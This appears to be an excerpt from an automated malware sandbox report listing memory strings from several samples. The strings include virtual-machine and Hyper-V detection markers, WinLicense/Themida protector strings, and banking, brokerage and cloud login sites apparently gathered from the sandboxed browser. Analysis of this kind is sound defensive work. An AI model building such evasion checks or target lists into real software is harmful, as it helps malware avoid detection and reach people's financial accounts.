Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 3Windows 2016 Server Standard without Hyper-V (core)
Source: 8e8f4571c5.exe, 0000001C.00000002.3349004818.00000000022BB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 8.1 Server Standard without Hyper-V (core)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 3Windows 11 Server Enterprise without Hyper-V (core)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: (Windows 2012 R2 Microsoft Hyper-V Server
Source: 9fa327eb6c.exe, 00000015.00000002.2718500578.00000000025B8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW^
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 6Windows 2012 R2 Server Standard without Hyper-V (core)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 11 Microsoft Hyper-V Server
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 8 Server Datacenter without Hyper-V (core)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 10 Server Datacenter without Hyper-V (core)
Source: file.exe, 00000000.00000003.2135139342.0000000028D0C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696428655
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 0Windows 8 Server Standard without Hyper-V (core)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 6Windows 8.1 Essential Server Solutions without Hyper-V
Source: file.exe, 00000000.00000003.2135139342.0000000028D0C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696428655o
Source: 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: vmware
Source: file.exe, 00000000.00000003.2135139342.0000000028D0C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 8 Server Standard without Hyper-V
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 4Windows 8 Essential Server Solutions without Hyper-V
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (full)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2016 Essential Server Solutions without Hyper-V
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (full)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (full)
Source: file.exe, 00000000.00000003.2135139342.0000000028D0C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (core)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: "Windows 8 Microsoft Hyper-V Server
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (full)
Source: RoamingIJEGHJECFC.exe, RoamingIJEGHJECFC.exe, 00000005.00000002.2283548107.0000000000533000.00000040.00000001.01000000.00000009.sdmp, userAAKKKEBFCG.exe, userAAKKKEBFCG.exe, 00000008.00000002.2309403161.000000000021F000.00000040.00000001.01000000.0000000B.sdmp, userAAKKKEBFCG.exe, 00000008.00000001.2247336233.000000000021F000.00000040.00000001.01000000.0000000B.sdmp, explorti.exe, explorti.exe, 00000009.00000002.2317563389.0000000000793000.00000040.00000001.01000000.0000000C.sdmp, explorti.exe, 0000000B.00000002.2318335961.0000000000793000.00000040.00000001.01000000.0000000C.sdmp, axplong.exe, 0000000F.00000002.2347284132.00000000005CF000.00000040.00000001.01000000.0000000F.sdmp, axplong.exe, 00000010.00000002.2347343665.00000000005CF000.00000040.00000001.01000000.0000000F.sdmp, explorti.exe, 00000013.00000002.3308623436.0000000000793000.00000040.00000001.01000000.0000000C.sdmp, axplong.exe, 00000014.00000002.3309306166.00000000005CF000.00000040.00000001.01000000.0000000F.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 3Windows 11 Server Datacenter without Hyper-V (full)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 10 Server Standard without Hyper-V
Source: file.exe, 00000000.00000003.2135139342.0000000028D0C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696428655f
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2012 R2 Microsoft Hyper-V Server
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (core)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (full)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (core)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 11 Server Standard without Hyper-V (core)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 8.1 Essential Server Solutions without Hyper-V
Source: file.exe, 00000000.00000003.2135139342.0000000028D0C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: file.exe, 00000000.00000003.2135139342.0000000028D0C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: file.exe, 00000000.00000003.2135139342.0000000028D0C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V (core)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Hyper-V (guest)
Source: file.exe, 00000000.00000003.2135139342.0000000028D0C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: file.exe, 00000000.00000003.2135139342.0000000028D0C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428655s
Source: file.exe, 00000000.00000003.2135139342.0000000028D0C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: file.exe, 00000000.00000003.2135139342.0000000028D0C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2012 Essential Server Solutions without Hyper-V
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 10 Microsoft Hyper-V Server
Source: file.exe, 00000000.00000003.2135139342.0000000028D0C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (full)
Source: file.exe, 00000000.00000003.2135139342.0000000028D0C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696428655j
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.00000000007C6000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.00000000007C6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: ~VirtualMachineTypes
Source: file.exe, 00000000.00000003.2135139342.0000000028D0C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.00000000007C6000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.00000000007C6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: ]DLL_Loader_VirtualMachine
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2016 Microsoft Hyper-V Server
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.00000000007C6000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.00000000007C6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: /Windows 2012 R2 Server Standard without Hyper-V
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: )Windows 8 Server Standard without Hyper-V
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 11 Server Standard without Hyper-V
Source: RoamingIJEGHJECFC.exe, 00000005.00000002.2283548107.0000000000533000.00000040.00000001.01000000.00000009.sdmp, userAAKKKEBFCG.exe, 00000008.00000002.2309403161.000000000021F000.00000040.00000001.01000000.0000000B.sdmp, userAAKKKEBFCG.exe, 00000008.00000001.2247336233.000000000021F000.00000040.00000001.01000000.0000000B.sdmp, explorti.exe, 00000009.00000002.2317563389.0000000000793000.00000040.00000001.01000000.0000000C.sdmp, explorti.exe, 0000000B.00000002.2318335961.0000000000793000.00000040.00000001.01000000.0000000C.sdmp, axplong.exe, 0000000F.00000002.2347284132.00000000005CF000.00000040.00000001.01000000.0000000F.sdmp, axplong.exe, 00000010.00000002.2347343665.00000000005CF000.00000040.00000001.01000000.0000000F.sdmp, explorti.exe, 00000013.00000002.3308623436.0000000000793000.00000040.00000001.01000000.0000000C.sdmp, axplong.exe, 00000014.00000002.3309306166.00000000005CF000.00000040.00000001.01000000.0000000F.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe, 00000000.00000003.2135139342.0000000028D0C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (core)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 11 Server Enterprise without Hyper-V (full)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 11 Server Datacenter without Hyper-V (full)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (core)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: %Windows 2012 Microsoft Hyper-V Server
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Hyper-V
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: $Windows 8.1 Microsoft Hyper-V Server
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: ,Windows 2012 Server Standard without Hyper-V
Source: file.exe, 00000000.00000003.2135139342.0000000028D0C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 3Windows 10 Server Datacenter without Hyper-V (full)
Source: file.exe, 00000000.00000003.2135139342.0000000028D0C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2012 Microsoft Hyper-V Server
Source: file.exe, 00000000.00000003.2135139342.0000000028D0C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696428655
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (core)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (core)
Source: file.exe, 00000000.00000002.2496187977.0000000002757000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2496187977.00000000027A8000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000013.00000002.3323751000.0000000001158000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000013.00000002.3323751000.000000000118D000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000014.00000002.3324088102.0000000000CB8000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000014.00000002.3324088102.0000000000CE9000.00000004.00000020.00020000.00000000.sdmp, 9fa327eb6c.exe, 00000015.00000002.2718500578.00000000025B8000.00000004.00000020.00020000.00000000.sdmp, 9fa327eb6c.exe, 00000019.00000002.2829021597.000000000272E000.00000004.00000020.00020000.00000000.sdmp, 9fa327eb6c.exe, 00000019.00000002.2829021597.0000000002761000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2959579682.000001B107486000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2909956595.000001B107486000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 8 Essential Server Solutions without Hyper-V
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 10 Essential Server Solutions without Hyper-V
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (full)
Source: file.exe, 00000000.00000003.2135139342.0000000028D0C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 8.1 Server Enterprise without Hyper-V (core)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 10 Server Standard without Hyper-V (core)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (core)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 7Windows 2012 Essential Server Solutions without Hyper-V
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 8 Server Enterprise without Hyper-V (full)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2016 Server Enterprise without Hyper-V (core)
Source: file.exe, 00000000.00000003.2135139342.0000000028D0C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2016 Server Datacenter without Hyper-V (full)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 8.1 Server Datacenter without Hyper-V (full)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: %Windows 2016 Microsoft Hyper-V Server
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (full)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 3Windows 10 Server Enterprise without Hyper-V (core)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 3Windows 11 Server Datacenter without Hyper-V (core)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 7Windows 2016 Essential Server Solutions without Hyper-V
Source: file.exe, 00000000.00000003.2135139342.0000000028D0C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: file.exe, 00000000.00000003.2135139342.0000000028D0C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: +Windows 8.1 Server Standard without Hyper-V
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2016 Server Standard without Hyper-V
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 3Windows 10 Server Datacenter without Hyper-V (core)
Source: 9fa327eb6c.exe, 00000019.00000002.2829021597.000000000270B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000003.2135139342.0000000028D0C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 11 Server Enterprise without Hyper-V (core)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (full)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (full)
